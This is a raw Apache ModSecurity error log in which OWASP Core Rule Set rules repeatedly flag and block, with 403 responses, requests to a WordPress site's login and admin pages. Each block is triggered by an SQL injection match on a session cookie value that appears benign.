[Mon May 11 18:29:01.569848 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDzDJnyuKVXoStDhbg7wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:01.965518 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIDzTJnyuKVXoStDhbg8QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:01.965807 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIDzTJnyuKVXoStDhbg8QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:02.717550 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDzTJnyuKVXoStDhbg8QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:02.822274 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIDzjJnyuKVXoStDhbg9QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:02.822549 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIDzjJnyuKVXoStDhbg9QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:03.755307 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDzjJnyuKVXoStDhbg9QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:03.924434 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIDzzJnyuKVXoStDhbg9wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:03.924724 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIDzzJnyuKVXoStDhbg9wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:04.584801 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIDzzJnyuKVXoStDhbg9wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:04.912426 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID0DJnyuKVXoStDhbg-QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:04.912709 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID0DJnyuKVXoStDhbg-QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:06.058508 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID0DJnyuKVXoStDhbg-QAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:06.401122 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID0jJnyuKVXoStDhbg-wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:06.401517 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID0jJnyuKVXoStDhbg-wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:07.436308 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID0jJnyuKVXoStDhbg-wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:08.080224 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID1DJnyuKVXoStDhbg_gAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:08.080501 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID1DJnyuKVXoStDhbg_gAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:09.174117 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID1DJnyuKVXoStDhbg_gAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:09.566872 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID1TJnyuKVXoStDhbg_wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:09.567168 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID1TJnyuKVXoStDhbg_wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:10.520022 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID1TJnyuKVXoStDhbg_wAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:10.624532 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID1jJnyuKVXoStDhbhAQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:10.624825 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID1jJnyuKVXoStDhbhAQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:11.382263 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID1jJnyuKVXoStDhbhAQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:11.671019 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID1zJnyuKVXoStDhbhAwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:11.671343 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID1zJnyuKVXoStDhbhAwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:12.317105 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID1zJnyuKVXoStDhbhAwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:12.740986 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID2DJnyuKVXoStDhbhBQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:12.741271 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID2DJnyuKVXoStDhbhBQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:13.611332 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID2DJnyuKVXoStDhbhBQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:13.850893 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID2TJnyuKVXoStDhbhCAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:13.851182 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID2TJnyuKVXoStDhbhCAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:14.469015 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID2TJnyuKVXoStDhbhCAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:14.917292 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID2jJnyuKVXoStDhbhCQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:14.917579 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID2jJnyuKVXoStDhbhCQAAAEE"], referer: https://rentparadise.fr/wp-login.php
